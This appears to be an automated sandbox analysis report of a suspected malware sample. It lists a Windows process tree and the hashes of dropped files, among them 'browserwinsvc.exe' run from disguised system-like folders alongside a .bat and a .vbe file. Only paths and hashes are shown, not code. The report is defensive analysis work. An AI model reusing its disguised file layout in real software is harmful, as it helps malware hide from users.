                                                                                                                                                • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2212,8600648407386539264,17117428256664181325,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2264 /prefetch:3
                                                                                                                                                  2⤵
                                                                                                                                                    PID:5116
                                                                                                                                                  • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2212,8600648407386539264,17117428256664181325,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2868 /prefetch:8
                                                                                                                                                    2⤵
                                                                                                                                                      PID:5228
                                                                                                                                                    • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2212,8600648407386539264,17117428256664181325,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3332 /prefetch:1
                                                                                                                                                      2⤵
                                                                                                                                                        PID:3060
                                                                                                                                                      • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2212,8600648407386539264,17117428256664181325,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3340 /prefetch:1
                                                                                                                                                        2⤵
                                                                                                                                                          PID:1000
                                                                                                                                                        • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                          "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2212,8600648407386539264,17117428256664181325,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4984 /prefetch:1
                                                                                                                                                          2⤵
                                                                                                                                                            PID:5712
                                                                                                                                                          • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                            "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2212,8600648407386539264,17117428256664181325,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4532 /prefetch:1
                                                                                                                                                            2⤵
                                                                                                                                                              PID:5464
                                                                                                                                                            • C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe
                                                                                                                                                              "C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2212,8600648407386539264,17117428256664181325,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5556 /prefetch:8
                                                                                                                                                              2⤵
                                                                                                                                                                PID:4136
                                                                                                                                                              • C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe
                                                                                                                                                                "C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2212,8600648407386539264,17117428256664181325,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5556 /prefetch:8
                                                                                                                                                                2⤵
                                                                                                                                                                  PID:5796
                                                                                                                                                                • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2212,8600648407386539264,17117428256664181325,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5660 /prefetch:1
                                                                                                                                                                  2⤵
                                                                                                                                                                    PID:4524
                                                                                                                                                                  • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=audio.mojom.AudioService --field-trial-handle=2212,8600648407386539264,17117428256664181325,131072 --lang=en-US --service-sandbox-type=audio --mojo-platform-channel-handle=3624 /prefetch:8
                                                                                                                                                                    2⤵
                                                                                                                                                                      PID:2364
                                                                                                                                                                    • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=video_capture.mojom.VideoCaptureService --field-trial-handle=2212,8600648407386539264,17117428256664181325,131072 --lang=en-US --service-sandbox-type=video_capture --mojo-platform-channel-handle=5764 /prefetch:8
                                                                                                                                                                      2⤵
                                                                                                                                                                      • Modifies registry class
                                                                                                                                                                      PID:5820
                                                                                                                                                                    • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2212,8600648407386539264,17117428256664181325,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=13 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5828 /prefetch:1
                                                                                                                                                                      2⤵
                                                                                                                                                                        PID:2560
                                                                                                                                                                      • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2212,8600648407386539264,17117428256664181325,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=14 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5896 /prefetch:1
                                                                                                                                                                        2⤵
                                                                                                                                                                          PID:5544
                                                                                                                                                                        • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                          "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2212,8600648407386539264,17117428256664181325,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=15 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5792 /prefetch:1
                                                                                                                                                                          2⤵
                                                                                                                                                                            PID:180
                                                                                                                                                                          • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                            "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2212,8600648407386539264,17117428256664181325,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=16 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6080 /prefetch:1
                                                                                                                                                                            2⤵
                                                                                                                                                                              PID:2008
                                                                                                                                                                            • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                              "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2212,8600648407386539264,17117428256664181325,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=17 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6108 /prefetch:1
                                                                                                                                                                              2⤵
                                                                                                                                                                                PID:5144
                                                                                                                                                                              • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2212,8600648407386539264,17117428256664181325,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=18 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5936 /prefetch:1
                                                                                                                                                                                2⤵
                                                                                                                                                                                  PID:2940
                                                                                                                                                                                • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2212,8600648407386539264,17117428256664181325,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=19 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5236 /prefetch:1
                                                                                                                                                                                  2⤵
                                                                                                                                                                                    PID:5420
                                                                                                                                                                                  • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2212,8600648407386539264,17117428256664181325,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=20 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4112 /prefetch:1
                                                                                                                                                                                    2⤵
                                                                                                                                                                                      PID:964
                                                                                                                                                                                  • C:\Windows\System32\CompPkgSrv.exe
                                                                                                                                                                                    C:\Windows\System32\CompPkgSrv.exe -Embedding
                                                                                                                                                                                    1⤵
                                                                                                                                                                                      PID:4500
                                                                                                                                                                                    • C:\Windows\System32\CompPkgSrv.exe
                                                                                                                                                                                      C:\Windows\System32\CompPkgSrv.exe -Embedding
                                                                                                                                                                                      1⤵
                                                                                                                                                                                        PID:5268
                                                                                                                                                                                      • C:\mswebFonthost\browserwinsvc.exe.exe
                                                                                                                                                                                        C:\mswebFonthost\browserwinsvc.exe
                                                                                                                                                                                        1⤵
                                                                                                                                                                                        • Executes dropped EXE
                                                                                                                                                                                        PID:5164

                                                                                                                                                                                      Network

                                                                                                                                                                                      MITRE ATT&CK Enterprise v15

                                                                                                                                                                                      Replay Monitor

                                                                                                                                                                                      Loading Replay Monitor...

                                                                                                                                                                                      Downloads

                                                                                                                                                                                      • C:\Config.Msi\e57c96d.rbs

                                                                                                                                                                                        Filesize

                                                                                                                                                                                        1.0MB

                                                                                                                                                                                        MD5

                                                                                                                                                                                        a988ae6a4e9373767c6fbecd5de3a273

                                                                                                                                                                                        SHA1

                                                                                                                                                                                        025cb056608ada5ea7b12b848a15e94952fbef19

                                                                                                                                                                                        SHA256

                                                                                                                                                                                        c59688e693aabab39802629775e9dc38edb18a9f051f50a38d0d50962d7b908d

                                                                                                                                                                                        SHA512

                                                                                                                                                                                        e249d3fa74e91bc1baff8af9b8de3e4864762bb5eed512204fed8bc0aa2189ac7a0b879786250ec4545064fb438c1e6b6485ab05d78f6aed7010f649ca676db8

                                                                                                                                                                                      • C:\Program Files (x86)\chrome_Unpacker_BeginUnzipping4788_1888021287\LICENSE

                                                                                                                                                                                        Filesize

                                                                                                                                                                                        473B

                                                                                                                                                                                        MD5

                                                                                                                                                                                        f6719687bed7403612eaed0b191eb4a9

                                                                                                                                                                                        SHA1

                                                                                                                                                                                        dd03919750e45507743bd089a659e8efcefa7af1

                                                                                                                                                                                        SHA256

                                                                                                                                                                                        afb514e4269594234b32c873ba2cd3cc8892e836861137b531a40a1232820c59

                                                                                                                                                                                        SHA512

                                                                                                                                                                                        dd14a7eae05d90f35a055a5098d09cd2233d784f6ac228b5927925241689bff828e573b7a90a5196bfdd7aaeecf00f5c94486ad9e3910cfb07475fcfbb7f0d56

                                                                                                                                                                                      • C:\Program Files (x86)\chrome_Unpacker_BeginUnzipping4788_1888021287\manifest.json

                                                                                                                                                                                        Filesize

                                                                                                                                                                                        984B

                                                                                                                                                                                        MD5

                                                                                                                                                                                        0359d5b66d73a97ce5dc9f89ed84c458

                                                                                                                                                                                        SHA1

                                                                                                                                                                                        ce17e52eaac909dd63d16d93410de675d3e6ec0d

                                                                                                                                                                                        SHA256

                                                                                                                                                                                        beeab2f8d3833839399dde15ce9085c17b304445577d21333e883d6db6d0b755

                                                                                                                                                                                        SHA512

                                                                                                                                                                                        8fd94a098a4ab5c0fcd48c2cef2bb03328dd4d25c899bf5ed1ca561347d74a8aab8a214ba2d3180a86df72c52eb26987a44631d0ecd9edc84976c28d6c9dc16a

                                                                                                                                                                                      • C:\Program Files\nodejs\node_modules\npm\node_modules\@npmcli\arborist\LICENSE.md

                                                                                                                                                                                        Filesize

                                                                                                                                                                                        818B

                                                                                                                                                                                        MD5

                                                                                                                                                                                        2916d8b51a5cc0a350d64389bc07aef6

                                                                                                                                                                                        SHA1

                                                                                                                                                                                        c9d5ac416c1dd7945651bee712dbed4d158d09e1

                                                                                                                                                                                        SHA256

                                                                                                                                                                                        733dcbf5b1c95dc765b76db969b998ce0cbb26f01be2e55e7bccd6c7af29cb04

                                                                                                                                                                                        SHA512

                                                                                                                                                                                        508c5d1842968c478e6b42b94e04e0b53a342dfaf52d55882fdcfe02c98186e9701983ab5e9726259fba8336282e20126c70d04fc57964027586a40e96c56b74

                                                                                                                                                                                      • C:\Program Files\nodejs\node_modules\npm\node_modules\aggregate-error\license

                                                                                                                                                                                        Filesize

                                                                                                                                                                                        1KB

                                                                                                                                                                                        MD5

                                                                                                                                                                                        5ad87d95c13094fa67f25442ff521efd

                                                                                                                                                                                        SHA1

                                                                                                                                                                                        01f1438a98e1b796e05a74131e6bb9d66c9e8542

                                                                                                                                                                                        SHA256

                                                                                                                                                                                        67292c32894c8ac99db06ffa1cb8e9a5171ef988120723ebe673bf76712260ec

                                                                                                                                                                                        SHA512

                                                                                                                                                                                        7187720ccd335a10c9698f8493d6caa2d404e7b21731009de5f0da51ad5b9604645fbf4bc640aa94513b9eb372aa6a31df2467198989234bc2afbce87f76fbc3

                                                                                                                                                                                      • C:\Program Files\nodejs\node_modules\npm\node_modules\bin-links\LICENSE

                                                                                                                                                                                        Filesize

                                                                                                                                                                                        754B

                                                                                                                                                                                        MD5

                                                                                                                                                                                        d2cf52aa43e18fdc87562d4c1303f46a

                                                                                                                                                                                        SHA1

                                                                                                                                                                                        58fb4a65fffb438630351e7cafd322579817e5e1

                                                                                                                                                                                        SHA256

                                                                                                                                                                                        45e433413760dc3ae8169be5ed9c2c77adc31ad4d1bc5a28939576df240f29a0

                                                                                                                                                                                        SHA512

                                                                                                                                                                                        54e33d7998b5e9ba76b2c852b4d0493ebb1b1ee3db777c97e6606655325ff66124a0c0857ca4d62de96350dbaee8d20604ec22b0edc17b472086da4babbbcb16

                                                                                                                                                                                      • C:\Program Files\nodejs\node_modules\npm\node_modules\libnpmhook\LICENSE.md

                                                                                                                                                                                        Filesize

                                                                                                                                                                                        771B

                                                                                                                                                                                        MD5

                                                                                                                                                                                        e9dc66f98e5f7ff720bf603fff36ebc5

                                                                                                                                                                                        SHA1

                                                                                                                                                                                        f2b428eead844c4bf39ca0d0cf61f6b10aeeb93b

                                                                                                                                                                                        SHA256

                                                                                                                                                                                        b49c8d25a8b57fa92b2902d09c4b8a809157ee32fc10d17b7dbb43c4a8038f79

                                                                                                                                                                                        SHA512

                                                                                                                                                                                        8027d65e1556511c884cb80d3c1b846fc9d321f3f83002664ad3805c4dee8e6b0eaf1db81c459153977bdbde9e760b0184ba6572f68d78c37bff617646bcfc3b

                                                                                                                                                                                      • C:\Program Files\nodejs\node_modules\npm\node_modules\libnpmorg\LICENSE

                                                                                                                                                                                        Filesize

                                                                                                                                                                                        730B

                                                                                                                                                                                        MD5

                                                                                                                                                                                        072ac9ab0c4667f8f876becedfe10ee0

                                                                                                                                                                                        SHA1

                                                                                                                                                                                        0227492dcdc7fb8de1d14f9d3421c333230cf8fe

                                                                                                                                                                                        SHA256

                                                                                                                                                                                        2ef361317adeda98117f14c5110182c28eae233af1f7050c83d4396961d14013

                                                                                                                                                                                        SHA512

                                                                                                                                                                                        f38fd6506bd9795bb27d31f1ce38b08c9e6f1689c34fca90e9e1d5194fa064d1f34a9c51d15941506ebbbcd6d4193055e9664892521b7e39ebcd61c3b6f25013

                                                                                                                                                                                      • C:\Program Files\nodejs\node_modules\npm\node_modules\minipass-pipeline\node_modules\minipass\package.json

                                                                                                                                                                                        Filesize

                                                                                                                                                                                        1KB

                                                                                                                                                                                        MD5

                                                                                                                                                                                        d116a360376e31950428ed26eae9ffd4

                                                                                                                                                                                        SHA1

                                                                                                                                                                                        192b8e06fb4e1f97e5c5c7bf62a9bff7704c198b

                                                                                                                                                                                        SHA256

                                                                                                                                                                                        c3052bd85910be313e38ad355528d527b565e70ef15a784db3279649eee2ded5

                                                                                                                                                                                        SHA512

                                                                                                                                                                                        5221c7648f4299234a4637c47d3f1eb5e147014704913bc6fdad91b9b6a6ccc109bced63376b82b046bb5cad708464c76fb452365b76dbf53161914acf8fb11a

                                                                                                                                                                                      • C:\Program Files\nodejs\node_modules\npm\node_modules\minizlib\node_modules\minipass\LICENSE

                                                                                                                                                                                        Filesize

                                                                                                                                                                                        802B

                                                                                                                                                                                        MD5

                                                                                                                                                                                        d7c8fab641cd22d2cd30d2999cc77040

                                                                                                                                                                                        SHA1

                                                                                                                                                                                        d293601583b1454ad5415260e4378217d569538e

                                                                                                                                                                                        SHA256

                                                                                                                                                                                        04400db77d925de5b0264f6db5b44fe6f8b94f9419ad3473caaa8065c525c0be

                                                                                                                                                                                        SHA512

                                                                                                                                                                                        278ff929904be0c19ee5fb836f205e3e5b3e7cec3d26dd42bbf1e7e0ca891bf9c42d2b28fce3741ae92e4a924baf7490c7c6c59284127081015a82e2653e0764

                                                                                                                                                                                      • C:\Program Files\nodejs\node_modules\npm\node_modules\minizlib\node_modules\minipass\index.js

                                                                                                                                                                                        Filesize

                                                                                                                                                                                        16KB

                                                                                                                                                                                        MD5

                                                                                                                                                                                        bc0c0eeede037aa152345ab1f9774e92

                                                                                                                                                                                        SHA1

                                                                                                                                                                                        56e0f71900f0ef8294e46757ec14c0c11ed31d4e

                                                                                                                                                                                        SHA256

                                                                                                                                                                                        7a395802fbe01bb3dc8d09586e0864f255874bf897378e546444fbaec29f54c5

                                                                                                                                                                                        SHA512

                                                                                                                                                                                        5f31251825554bf9ed99eda282fa1973fcec4a078796a10757f4fb5592f2783c4ebdd00bdf0d7ed30f82f54a7668446a372039e9d4589db52a75060ca82186b3

                                                                                                                                                                                      • C:\Program Files\nodejs\node_modules\npm\node_modules\nopt\LICENSE

                                                                                                                                                                                        Filesize

                                                                                                                                                                                        780B

                                                                                                                                                                                        MD5

                                                                                                                                                                                        b020de8f88eacc104c21d6e6cacc636d

                                                                                                                                                                                        SHA1

                                                                                                                                                                                        20b35e641e3a5ea25f012e13d69fab37e3d68d6b

                                                                                                                                                                                        SHA256

                                                                                                                                                                                        3f24d692d165989cd9a00fe35ca15a2bc6859e3361fa42aa20babd435f2e4706

                                                                                                                                                                                        SHA512

                                                                                                                                                                                        4220617e29dd755ad592295bc074d6bc14d44a1feeed5101129669f3ecf0e34eaa4c7c96bbc83da7352631fa262baab45d4a370dad7dabec52b66f1720c28e38

                                                                                                                                                                                      • C:\Program Files\nodejs\node_modules\npm\node_modules\promise-all-reject-late\LICENSE

                                                                                                                                                                                        Filesize

                                                                                                                                                                                        763B

                                                                                                                                                                                        MD5

                                                                                                                                                                                        7428aa9f83c500c4a434f8848ee23851

                                                                                                                                                                                        SHA1

                                                                                                                                                                                        166b3e1c1b7d7cb7b070108876492529f546219f

                                                                                                                                                                                        SHA256

                                                                                                                                                                                        1fccd0ad2e7e0e31ddfadeaf0660d7318947b425324645aa85afd7227cab52d7

                                                                                                                                                                                        SHA512

                                                                                                                                                                                        c7f01de85f0660560206784cdf159b2bdc5f1bc87131f5a8edf384eba47a113005491520b0a25d3cc425985b5def7b189e18ff76d7d562c434dc5d8c82e90cce

                                                                                                                                                                                      • C:\Program Files\nodejs\node_modules\npm\node_modules\tar\node_modules\fs-minipass\node_modules\minipass\index.d.ts

                                                                                                                                                                                        Filesize

                                                                                                                                                                                        4KB

                                                                                                                                                                                        MD5

                                                                                                                                                                                        f0bd53316e08991d94586331f9c11d97

                                                                                                                                                                                        SHA1

                                                                                                                                                                                        f5a7a6dc0da46c3e077764cfb3e928c4a75d383e

                                                                                                                                                                                        SHA256

                                                                                                                                                                                        dd3eda3596af30eda88b4c6c2156d3af6e7fa221f39c46e492c5e9fb697e2fef

                                                                                                                                                                                        SHA512

                                                                                                                                                                                        fd6affbaed67d09cf45478f38e92b8ca6c27650a232cbbeaff36e4f7554fb731ae44cf732378641312e98221539e3d8fabe80a7814e4f425026202de44eb5839

                                                                                                                                                                                      • C:\Program Files\nodejs\node_modules\npm\node_modules\treeverse\LICENSE

                                                                                                                                                                                        Filesize

                                                                                                                                                                                        771B

                                                                                                                                                                                        MD5

                                                                                                                                                                                        1d7c74bcd1904d125f6aff37749dc069

                                                                                                                                                                                        SHA1

                                                                                                                                                                                        21e6dfe0fffc2f3ec97594aa261929a3ea9cf2ab

                                                                                                                                                                                        SHA256

                                                                                                                                                                                        24b8d53712087b867030d18f2bd6d1a72c78f9fb4dee0ce025374da25e4443b9

                                                                                                                                                                                        SHA512

                                                                                                                                                                                        b5ac03addd29ba82fc05eea8d8d09e0f2fa9814d0dd619c2f7b209a67d95b538c3c2ff70408641ef3704f6a14e710e56f4bf57c2bb3f8957ba164f28ee591778

                                                                                                                                                                                      • C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Node.js\Node.js documentation.url

                                                                                                                                                                                        Filesize

                                                                                                                                                                                        168B

                                                                                                                                                                                        MD5

                                                                                                                                                                                        db7dbbc86e432573e54dedbcc02cb4a1

                                                                                                                                                                                        SHA1

                                                                                                                                                                                        cff9cfb98cff2d86b35dc680b405e8036bbbda47

                                                                                                                                                                                        SHA256

                                                                                                                                                                                        7cf8a9c96f9016132be81fd89f9573566b7dc70244a28eb59d573c2fdba1def9

                                                                                                                                                                                        SHA512

                                                                                                                                                                                        8f35f2e7dac250c66b209acecab836d3ecf244857b81bacebc214f0956ec108585990f23ff3f741678e371b0bee78dd50029d0af257a3bb6ab3b43df1e39f2ec

                                                                                                                                                                                      • C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Node.js\Node.js website.url

                                                                                                                                                                                        Filesize

                                                                                                                                                                                        133B

                                                                                                                                                                                        MD5

                                                                                                                                                                                        35b86e177ab52108bd9fed7425a9e34a

                                                                                                                                                                                        SHA1

                                                                                                                                                                                        76a1f47a10e3ab829f676838147875d75022c70c

                                                                                                                                                                                        SHA256

                                                                                                                                                                                        afaa6c6335bd3db79e46fb9d4d54d893cee9288e6bb4738294806a9751657319

                                                                                                                                                                                        SHA512

                                                                                                                                                                                        3c8047c94b789c8496af3c2502896cef2d348ee31618893b9b71244af667ec291dcb9b840f869eb984624660086db0c848d1846aa601893e6f9955e56da19f62

                                                                                                                                                                                      • C:\Surrogateprovidercomponentsessionmonitor\GPEuaUZk.bat

                                                                                                                                                                                        Filesize

                                                                                                                                                                                        63B

                                                                                                                                                                                        MD5

                                                                                                                                                                                        6de687cf7ca366429c953cb49905b70a

                                                                                                                                                                                        SHA1

                                                                                                                                                                                        58e2c1823c038d8da8a2f042672027184066279e

                                                                                                                                                                                        SHA256

                                                                                                                                                                                        80d02a1cb8e68ffbc609a6c4914600604153ce929d46994200f837d354a5a611

                                                                                                                                                                                        SHA512

                                                                                                                                                                                        6bfa7a07d6adf167458cece0ba3a110479ee7677feb58c0ae9ba5c8913bcdda13664060ce0261abc1668c18831d5c73f6bc570be8595323d46704b810fc024ef

                                                                                                                                                                                      • C:\Surrogateprovidercomponentsessionmonitor\browserwinsvc.exe

                                                                                                                                                                                        Filesize

                                                                                                                                                                                        1.5MB

                                                                                                                                                                                        MD5

                                                                                                                                                                                        037a82f24f4cddb5c5c5cdd21a64f307

                                                                                                                                                                                        SHA1

                                                                                                                                                                                        a310eecaa57af7cd61ba38805acba246c433b479

                                                                                                                                                                                        SHA256

                                                                                                                                                                                        3829c70319b18efdd69f5f8d0d7b5c5855c29f7c5b7395f5a82bf53c8988624b

                                                                                                                                                                                        SHA512

                                                                                                                                                                                        b7d9604ce79f1d56ea6c221aade92b0492e737384c5604b134587edf08c13d163539c5f2864864e3d7b50e6cb4f75975ab6a7a715f849e961442a05ee0280bcc

                                                                                                                                                                                      • C:\Surrogateprovidercomponentsessionmonitor\oIWytMk.vbe

                                                                                                                                                                                        Filesize

                                                                                                                                                                                        225B

                                                                                                                                                                                        MD5

                                                                                                                                                                                        391a96335b25ba0a8cebdf4628d737cf

                                                                                                                                                                                        SHA1

                                                                                                                                                                                        3b81d5ba63397e5e542bf8090888c4b6f8037e92

                                                                                                                                                                                        SHA256

                                                                                                                                                                                        835d12603e51f2c557699e79109d011a01b72e3041c566e3422602f172eda58f

                                                                                                                                                                                        SHA512

                                                                                                                                                                                        47b74d5cd5adba289dde01fea763267d73468555da6d6d366b76590454481072bc3c2362765e3c6af6155c8f9e54fad0a53118f75eae78ff24ffee0046b5583c

                                                                                                                                                                                      • C:\Users\Admin\AppData\Local\Bloxstrap\Bloxstrap.exe

                                                                                                                                                                                        Filesize

                                                                                                                                                                                        249KB

                                                                                                                                                                                        MD5

                                                                                                                                                                                        772c9fecbd0397f6cfb3d866cf3a5d7d

                                                                                                                                                                                        SHA1

                                                                                                                                                                                        6de3355d866d0627a756d0d4e29318e67650dacf

                                                                                                                                                                                        SHA256

                                                                                                                                                                                        2f88ea7e1183d320fb2b7483de2e860da13dc0c0caaf58f41a888528d78c809f

                                                                                                                                                                                        SHA512

                                                                                                                                                                                        82048bd6e50d38a863379a623b8cfda2d1553d8141923acf13f990c7245c833082523633eaa830362a12bfff300da61b3d8b3cccbe038ce2375fdfbd20dbca31

                                                                                                                                                                                      • C:\Users\Admin\AppData\Local\CefSharp\LocalPrefs.json

                                                                                                                                                                                        Filesize

                                                                                                                                                                                        643B

                                                                                                                                                                                        MD5

                                                                                                                                                                                        50a0b958d437dfd495b81d44f33a0bf4

                                                                                                                                                                                        SHA1

                                                                                                                                                                                        66a1770ffb83fae294e854596bc82da2c99be6e1

                                                                                                                                                                                        SHA256

                                                                                                                                                                                        93de5d93b7758602ae2baefb9a64cf00a6cd8f7a173547866067187a0b542e51

                                                                                                                                                                                        SHA512

                                                                                                                                                                                        1c075ad65aba1c6e057d1aea12d3e2e352b2e3b4e4c23a239c8f8a65925c0b44988c60bed29ca93af0e7c851b08cc22244f9ec5fbceca8088b98e985205e4052

                                                                                                                                                                                      • C:\Users\Admin\AppData\Local\CefSharp\LocalPrefs.json

                                                                                                                                                                                        Filesize

                                                                                                                                                                                        755B

                                                                                                                                                                                        MD5

                                                                                                                                                                                        4e468c96979cc0c09f2ec6cbce42de10

                                                                                                                                                                                        SHA1

                                                                                                                                                                                        793c981471e1787c9886eeb47e03692745b7f8c1

                                                                                                                                                                                        SHA256

                                                                                                                                                                                        82d8569f5526e9687d5a7f7448f893a8cd2a636380e400af2ffd7900ab899c2e

                                                                                                                                                                                        SHA512

                                                                                                                                                                                        2d17ea7b769ba7d1f1b9afa462614cbda8d205d8c37b2b88e4801b6f0281eb9df47bdca183fe0c69554700a3f13053e7d1b30f0075ed6714e17da9410acce00b

                                                                                                                                                                                      • C:\Users\Admin\AppData\Local\CefSharp\LocalPrefs.json~RFe5f7817.TMP

                                                                                                                                                                                        Filesize

                                                                                                                                                                                        434B

                                                                                                                                                                                        MD5

                                                                                                                                                                                        050fa26bd980b2c96b09824913bd3f95

                                                                                                                                                                                        SHA1

                                                                                                                                                                                        7c0f1c01ce154c1422dd66cdcb06bdf20a12abdf

                                                                                                                                                                                        SHA256

                                                                                                                                                                                        47b75e749f310fd23168b4e181a31d1e2bac3ef891097f0769b6fb63a963ed77

                                                                                                                                                                                        SHA512

                                                                                                                                                                                        816c22cbd9e4081202cc9864015f287891b5f1b875e27183898ecffef5f7815ff0f82a34be4decd4757fb9be0c9cad5909fa50634b1cb9601f81315aa94e11b1

                                                                                                                                                                                      • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

                                                                                                                                                                                        Filesize

                                                                                                                                                                                        152B

                                                                                                                                                                                        MD5

                                                                                                                                                                                        9abb787f6c5a61faf4408f694e89b50e

                                                                                                                                                                                        SHA1

                                                                                                                                                                                        914247144868a2ff909207305255ab9bbca33d7e

                                                                                                                                                                                        SHA256

                                                                                                                                                                                        ecfd876b653319de412bf6be83bd824dda753b4d9090007231a335819d29ea07

                                                                                                                                                                                        SHA512

                                                                                                                                                                                        0f8139c45a7efab6de03fd9ebfe152e183ff155f20b03d4fac4a52cbbf8a3779302fed56facc9c7678a2dcf4f1ee89a26efd5bada485214edd9bf6b5cd238a55

                                                                                                                                                                                      • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

                                                                                                                                                                                        Filesize

                                                                                                                                                                                        152B

                                                                                                                                                                                        MD5

                                                                                                                                                                                        b6c11a2e74ef272858b9bcac8f5ebf97

                                                                                                                                                                                        SHA1

                                                                                                                                                                                        2a06945314ebaa78f3ede1ff2b79f7357c3cb36b

                                                                                                                                                                                        SHA256

                                                                                                                                                                                        f88faeb70e2a7849587be3e49e6884f5159ac76ef72b7077ac36e5fbf332d777

                                                                                                                                                                                        SHA512

